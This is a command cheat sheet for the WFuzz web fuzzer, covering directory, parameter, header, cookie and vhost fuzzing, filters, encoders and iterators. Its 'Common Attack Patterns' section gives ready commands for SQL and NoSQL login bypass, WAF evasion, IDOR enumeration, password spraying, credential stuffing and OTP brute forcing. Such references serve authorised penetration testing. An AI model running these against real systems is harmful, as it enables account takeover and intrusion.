WFuzz
FUZZ Keyword Basics
# Basic directory fuzzing
wfuzz -c -w <wordlist> <url>/FUZZ
# With extensions
wfuzz -c -w <wordlist> <url>/FUZZ.php
# Status code filter (hide 404)
wfuzz -c -w <wordlist> --hc 404 <url>/FUZZ
# Show only 200 responses
wfuzz -c -w <wordlist> --sc 200 <url>/FUZZ
# Concurrent connections (-t)
wfuzz -c -z file,<wordlist> -t 50 --hc 404 <url>/FUZZ
# No color output
wfuzz -w <wordlist> --hc 404 <url>/FUZZ
Multiple Injection Points (FUZZ / FUZ2Z / FUZ3Z)
# Two injection points
wfuzz -c -z file,users.txt -z file,<wordlist> --hc 404 <url>/FUZZ/FUZ2Z
# Username + password brute
wfuzz -c -z file,users.txt -z file,<wordlist> \
-d "username=FUZZ&password=FUZ2Z" --hc 200 <url>/login
# Three injection points
wfuzz -c -z file,list1.txt -z file,list2.txt -z file,list3.txt \
<url>/FUZZ/FUZ2Z/FUZ3Z --hc 404
# Parameter name + value discovery
wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt \
-z file,<wordlist> --hc 404 "<url>?FUZZ=FUZ2Z"
Filter Options
# Hide by status code (one or more)
wfuzz -c -w <wordlist> --hc 404 <url>/FUZZ
wfuzz -c -w <wordlist> --hc 404,403,400 <url>/FUZZ
# Show by status code
wfuzz -c -w <wordlist> --sc 200 <url>/FUZZ
wfuzz -c -w <wordlist> --sc 200,301,302 <url>/FUZZ
# Hide by number of lines
wfuzz -c -w <wordlist> --hl 42 <url>/FUZZ
# Show by number of lines
wfuzz -c -w <wordlist> --sl 10 <url>/FUZZ
# Hide by number of words
wfuzz -c -w <wordlist> --hw 15 <url>/FUZZ
# Show by number of words
wfuzz -c -w <wordlist> --sw 50 <url>/FUZZ
# Hide by response size (bytes/chars)
wfuzz -c -w <wordlist> --hh 1234 <url>/FUZZ
# Show by response size
wfuzz -c -w <wordlist> --sh 5000 <url>/FUZZ
# Regex match (show if matches)
wfuzz -c -w <wordlist> --ss "admin|login|dashboard" <url>/FUZZ
# Regex hide (hide if matches)
wfuzz -c -w <wordlist> --hs "Not Found|Error" <url>/FUZZ
Authentication
# Basic HTTP auth
wfuzz -c -w <wordlist> --hc 401 --basic <username>:<password> <url>/FUZZ
# Brute force basic auth
wfuzz -c -z file,users.txt -z file,<wordlist> \
--hc 401 --basic FUZZ:FUZ2Z <url>/FUZZ
# Cookie-based session
wfuzz -c -w <wordlist> --hc 404 -b "session=abc123" <url>/FUZZ
# Cookie brute (session token fuzz)
wfuzz -c -w <wordlist> --hc 302 -b "session=FUZZ" <url>/dashboard
# Bearer token
wfuzz -c -w <wordlist> --hc 404 -H "Authorization: Bearer <token>" <url>/api/FUZZ
# Multiple cookies
wfuzz -c -w <wordlist> -b "auth=abc123; csrf=xyz" --hc 404 <url>/FUZZ
# Custom header
wfuzz -c -w <wordlist> -H "X-Forwarded-For: 127.0.0.1" --hc 404 <url>/FUZZ
# Fuzz header value
wfuzz -c -w <wordlist> -H "X-Custom-Header: FUZZ" --hc 404 <url>/admin
# User agent fuzzing
wfuzz -c -w /usr/share/seclists/Fuzzing/User-Agents/user-agents.txt \
-H "User-Agent: FUZZ" --hc 403 <url>/admin
# Host header fuzzing (vhost)
wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
-H "Host: FUZZ.<domain>" --hh 1234 http://<ip>/
# Content-Type fuzzing
wfuzz -c -z list,"application/json-application/xml-text/plain" \
-H "Content-Type: FUZZ" --sc 200 <url>/api/upload
POST Data Fuzzing
# POST parameter value
wfuzz -c -w <wordlist> -d "username=admin&password=FUZZ" --hc 200 <url>/login
# POST parameter name
wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt \
-d "FUZZ=test" --hc 500 <url>/api
# JSON POST
wfuzz -c -w <wordlist> \
-H "Content-Type: application/json" \
-d '{"username":"FUZZ","password":"test"}' \
--hc 401 <url>/api/login
# XML POST
wfuzz -c -w <wordlist> \
-H "Content-Type: application/xml" \
-d '<user><name>FUZZ</name></user>' \
--sc 200 <url>/api/users
# Multi-field POST brute force
wfuzz -c -z file,users.txt -z file,<wordlist> \
-d "user=FUZZ&pass=FUZ2Z" --hc 200 <url>/login
Cookies
# Single cookie
wfuzz -c -w <wordlist> -b "session=FUZZ" --sc 200 <url>/profile
# Multiple cookies, fuzz one
wfuzz -c -w <wordlist> -b "session=abc123; role=FUZZ" --sc 200 <url>/admin
# Cookie + POST
wfuzz -c -w <wordlist> \
-b "session=abc123" \
-d "action=FUZZ" \
--hc 403 <url>/admin/action
Encoders
# URL encode the payload
wfuzz -c -w <wordlist>:urlencode --hc 404 <url>/FUZZ
# Base64 encode
wfuzz -c -w <wordlist>:base64 --hc 404 <url>/FUZZ
# HTML encode
wfuzz -c -w <wordlist>:html --hc 404 <url>/FUZZ
# MD5 hash
wfuzz -c -w <wordlist>:md5 --hc 404 <url>/FUZZ
# Double URL encode (bypass WAF)
wfuzz -c -w <wordlist>:urlencode:urlencode --hc 404 <url>/FUZZ
# Multiple encoders (try all against each word)
wfuzz -c -w <wordlist>:urlencode,base64 --hc 404 <url>/FUZZ
# List available encoders (verify encoder names and the encoder syntax accepted by your wfuzz version)
wfuzz -e encoders
Iterators
# Zip iterator (pairs elements 1:1; pass -m zip explicitly rather than relying on the default)
wfuzz -c -z file,list1.txt -z file,list2.txt -m zip --hc 404 <url>/FUZZ/FUZ2Z
# Product (all combinations)
wfuzz -c -z file,list1.txt -z file,list2.txt -m product --hc 404 <url>/FUZZ/FUZ2Z
# Chain (concatenate wordlists)
wfuzz -c -z file,list1.txt -z file,list2.txt -m chain --hc 404 <url>/FUZZ
# List payload (inline values separated by '-')
wfuzz -c -z list,"admin-user-test-guest" --hc 404 <url>/FUZZ
Common Attack Patterns
Auth Bypass
# SQL injection in login
wfuzz -c -w /usr/share/seclists/Fuzzing/SQLi/Generic-SQLi.txt \
-d "username=FUZZ&password=test" --hc 200 <url>/login
# NoSQL injection
wfuzz -c -w /usr/share/seclists/Fuzzing/Databases/NoSQL.txt \
-H "Content-Type: application/json" \
-d '{"username":{"$gt":""},"password":{"$gt":""}}' \
--sc 200 <url>/api/login
# Admin path bypass
wfuzz -c -w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt \
--hc 404 <url>/FUZZ
# HTTP verb bypass for 403
wfuzz -c -z list,"GET-POST-PUT-PATCH-DELETE-OPTIONS-HEAD-TRACE" \
-X FUZZ --hc 403 <url>/admin
Parameter Discovery
# Hidden GET parameter discovery
wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt \
--hh 1234 "<url>?FUZZ=test"
# Hidden POST parameter discovery
wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt \
-d "FUZZ=test" --hh 1234 <url>/submit
# IDOR parameter fuzzing
wfuzz -c -z range,1-1000 --hc 404 "<url>/user?id=FUZZ"
VHOST / Subdomain
# VHost fuzzing
wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
-H "Host: FUZZ.<domain>" --hh 1234 http://<ip>/
# Subdomain + path
wfuzz -c -z file,/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
-z file,<wordlist> -H "Host: FUZZ.<domain>" \
--hc 404 "http://<ip>/FUZ2Z"
Credential Brute Force
# Password spray (one password, many users)
wfuzz -c -w /usr/share/seclists/Usernames/top-usernames-shortlist.txt \
-d "username=FUZZ&password=<password>" \
--hc 200 <url>/login
# Credential stuffing
wfuzz -c -z file,users.txt -z file,passwords.txt \
-d "user=FUZZ&pass=FUZ2Z" -m product \
--hc 200 <url>/login
# OTP/PIN brute force
wfuzz -c -z range,0000-9999 \
-d "otp=FUZZ" --sc 302 <url>/verify
Output & Misc
# Output to file
wfuzz -c -w <wordlist> --hc 404 <url>/FUZZ -f output.txt,raw
# Output as JSON
wfuzz -c -w <wordlist> --hc 404 <url>/FUZZ -f output.json,json
# Proxy
wfuzz -c -w <wordlist> --hc 404 -p 127.0.0.1:8080 <url>/FUZZ
# SOCKS5 proxy
wfuzz -c -w <wordlist> --hc 404 -p 127.0.0.1:1080:SOCKS5 <url>/FUZZ
# Delay between requests
wfuzz -c -w <wordlist> --hc 404 -s 0.5 <url>/FUZZ
# Recursive path discovery, maximum depth 3 (redirect following is -L, below)
wfuzz -c -w <wordlist> --hc 404 -R 3 <url>/FUZZ
# Limit concurrent connections
wfuzz -c -w <wordlist> --hc 404 -t 10 <url>/FUZZ
# Follow redirects
wfuzz -c -w <wordlist> --hc 404 -L <url>/FUZZ
# List available plugins
wfuzz -e payloads
wfuzz -e iterators
wfuzz -e printers